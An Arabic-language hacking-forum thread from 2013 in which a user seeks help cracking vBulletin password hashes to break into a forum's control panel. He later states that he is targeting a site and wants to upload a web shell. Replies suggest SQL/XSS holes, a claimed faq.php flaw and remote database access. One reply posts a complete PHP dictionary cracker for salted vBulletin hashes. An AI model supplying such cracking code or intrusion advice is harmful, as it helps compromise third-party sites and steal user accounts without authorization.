التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-29-2013, 10:19 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

Unhappy مجاب: شباب استفسار بخصوص هاش vBulletin


السلام عليكم ورحمه الله وبركاته

اخواني ما ابي اطول في الكلام هل فيه طريقة لتخطي الهاش هذا حق vBulletin والدخول الى لوحة التحكم

لانو هوا الحااااااااااااجز الوحيد الي من اول ما بديت تعلمت الهكر وهوا قدامي وماني داري كيف افكه

حاولت اتعلم لغات برمجه عشان تساعدني فيه بس ما فيه فايده

اذا فيه طريقة ومضمونه وتكون 2013 لا تبخلوون عليه فيها

تحياتي لكم




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC afhf hsjtshv fow,w iha vBulletin

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
أفضل جواب - كتبه MaFia
الفي بي مو صعب تخترقه كل شخص وخبراته لكن الثغرات المعروفه اصبحت نادرة وشبه مستحيل يقع فيها مبرمج يعمل في هذه الشركه باستثناء
ثغرات
sql
x s s
اكثر انتشارا هذه الايام

اما ثغرة ملف
faq.php
التي تقصدها لساتها موجوده في الاصدار
3.8.6
في ملف اللغه الانجليزيه

ولازم يكون في شل مرفوع على السيرفر لكي تخترق المنتدى ولو كان الروت مفعل remote sql تستطيع الاتصال ريموت بهذه المعلومات وتتصل بالقاعدة


فك هاشات الفي بي ليس له حل جذري لكن انتظر اي شخص يجاوبك
قديم 05-29-2013, 02:41 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد
لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت
salt
او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه

لكن سؤال

من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 05-29-2013, 09:21 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Cyber Mafia
هاش الفي بي صعب فكه وشبه مستحيل اذا كان معقد
لكن حاول تفكه ببرنامج باسورد برو ويلزمك معرفة السالت
salt
او عن طريق البحث عن الهاش في قواعد بيانات وفيه شروحات للمنتدى لهذه الطريقه

لكن سؤال

من اين جبت الهاش ؟ هل من ثغره sql اول من الاتصال بقاعدة البيانات

من مسار لوحة التحكم الخاصه بسكربت الفبلتون من خلال السورس بيج

وحاولت اعدل على السورس بيج وغيرت الهاش الى هاش مفكوك وجاهز ما صلح يمكن فيه طريقة تكوين كود برمجي ينفع للكل بس للاسف خبرتي قليله في اللغات حقت البرمجه

تحياتي
التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 05-29-2013, 11:20 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


من الاساس هذه ليست ثغره شوفت في 2007 كذا موقع يحكي عنها لكنها ليست ثغره
الفي بي اقوى سكربت حتى لو كان فيه ثغره لن تستطيع استغلالها بسهوله

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 05-30-2013, 03:59 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره

وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه

اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 05-31-2013, 01:16 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة hank00sh
شكراً على تفاعلك اخوي Cyber Mafia بس والله مستغرب يعني الوحيد ما يقدر الواحد يهكره مره بالمره

وانت من خلال ما قلتلي انو ما فيه حتى لو فيه ثغره صعب تخترقه ولا فيه اي طريقه

اتذكر زمان نزلت ثغره في ملف التعليمات الي تطلع الديدا بيس وسويتها مره بس الكلام هذا زمان ونفعت معايا ما همني انا ابي حل كيف افك الهاش حقه لازم يكون فيه طريقه لانو كل شي يعتمد على البرمجه لو احد شاطر فيها خلاص كل شي متيسر وتحياتي لك



حبيبى ممكن تجرب السكربت هذا

او هناك طريقة ثانية اللى الجميع يعرفها فايرفوكس +Live HTTP Headers
وتقدر تتابعها من هنا
http://www.nextgenupdate.com/forums/...ecryption.html

والكود التالى لسكربت php لم اجربه لكن تقدر تجرب هذا ما اتسطعت ان اساعد به
كود PHP:

<?php 
set_time_limit
(0); 
error_reporting(0); 
$name $_SERVER['PHP_SELF']; 
$go true

echo 

_____ _ _ _____ _____ _______ 
/ ___| | | | | / _ \ / ___/|__ __| 
| | _ | |__| | | | | | | |___ | | 
| | | | | __ | | | | | \___ \ | | 
| |_| | | | | | | |_| | ___| | | | 
\_____/ |_| |_| \_____/ /_____/ |_| 
____ _ _____ _____ _____ ___ ___ 
| _ \ | | / _ \ / _ \ | _ \ \ \ / / 
| |_) | | | | | | | | | | | | | | \ \ \/ / 
| _ ( | | | | | | | | | | | | | | \ / 
| |_) | | |___ | |_| | | |_| | | |_| / | | 
|____/ |_____| \_____/ \_____/ |_____/ |__|[*]-----------------------------------------------------------------------[*] 
[+] Script Name : Vbulletin Hash Cracker 
[+] Version : 1.0 
[+] Programed By : G-B 
[+] Email : [email=g22b@hotmail.com]g22b@hotmail.com[/email] 
[+] Use : php 
$name[*]-----------------------------------------------------------------------[*] 

"


while(
$go){ 
$b true
$c true
$d true
$k false
while(
$b){ 
echo 
"[+] Hash -> "
$hash trim(stdin()); 
if(
strlen($hash) < 30){ 
echo 
"[*] This Is Not MD5. Try Again.\n"
}else{ 
$b false


while(
$c){ 
echo 
"[+] Salt -> "
$salt trim(stdin()); 
if(
strlen($hash) < 3){ 
echo 
"[*] This Is Not Salt. Try Again.\n"
}else{ 
$c false


while(
$d){ 
echo 
"[+] Wordlist Link -> "
$list trim(stdin()); 
if(!
file_get_contents($list)){ 
echo 
"[*] Can't Open Wordlist. Try Again.\n"
}else{ 
$d false



echo 
"\n\n"
echo 
"[*]------------------------------Start------------------------------------[*]\n\n"

$wordlist file_get_contents($list); 
$words explode("\n",$wordlist); 
foreach(
$words as $pass){ 
$pass trim($pass); 
$md5 md5(md5($pass).$salt); 
echo 
"[*] Try $pass \n"
if(
$md5 == $hash){ 
echo 
"\n\n[*] Password Cracked : $pass"
$k true
break; 


if(!
$k){ 
echo 
"\n\n[*] Can't Found Password In Wordlist."


echo 
"\n\n[+] Crack Another Hash ? (Y) or (N) -> "
$try stdin(); 
if(
$try == 'N' || $try == 'n'){ 
$go false


echo 
"[*] See U Later G-B."
#============================================== 
function stdin(){ 
$fp fopen("php://stdin","r"); 
$line trim(fgets($fp)); 
fclose($fp); 
return 
$line

#=========================================== 
?>
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 


التعديل الأخير تم بواسطة mido868 ; 05-31-2013 الساعة 01:19 AM.

   

رد مع اقتباس
قديم 05-30-2013, 10:37 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


الفي بي مو صعب تخترقه كل شخص وخبراته لكن الثغرات المعروفه اصبحت نادرة وشبه مستحيل يقع فيها مبرمج يعمل في هذه الشركه باستثناء
ثغرات
sql
x s s
اكثر انتشارا هذه الايام

اما ثغرة ملف
faq.php
التي تقصدها لساتها موجوده في الاصدار
3.8.6
في ملف اللغه الانجليزيه

ولازم يكون في شل مرفوع على السيرفر لكي تخترق المنتدى ولو كان الروت مفعل remote sql تستطيع الاتصال ريموت بهذه المعلومات وتتصل بالقاعدة


فك هاشات الفي بي ليس له حل جذري لكن انتظر اي شخص يجاوبك

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 05-31-2013, 02:19 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: شباب استفسار بخصوص هاش vBulletin


يعطيكم العافيه اخواني وبخصوص الكود اخوي انا ماني رافع شيل عشان استخدمه اقصد الاسكربت

ماني رافع شيل على السيرفر عشان استخدمه انا مستهدف موقع وحاااب اخش عليه من هذا الموقع عشان اقدر ارفع شيل

من خلال لوحة تحكم المنتدى بس اخو سايبر وضحلي نقطه انو في سكربت فيه ثغرهfaq.php

وراح احاول اجدها في السيرفر لعلي اوقعلي فيها واقدر من خلالها معرفة الديدا بيس والدخول على الموقع على طول او رفع الشيل

وعندي سوال بسيط الحين مواقع الرفع وبالذات موقع ترادنت حاولت ارفع شيل بصيغه صوره مع انو مكتوب الاحجام المقبلوه ومن ظمنها فيه بي اتش بي بس رفعتو يقلي خطا ورفعتو عن طريق اداة live HTTP الي في الفاير فوكس وتحياتي لكم

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:51 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0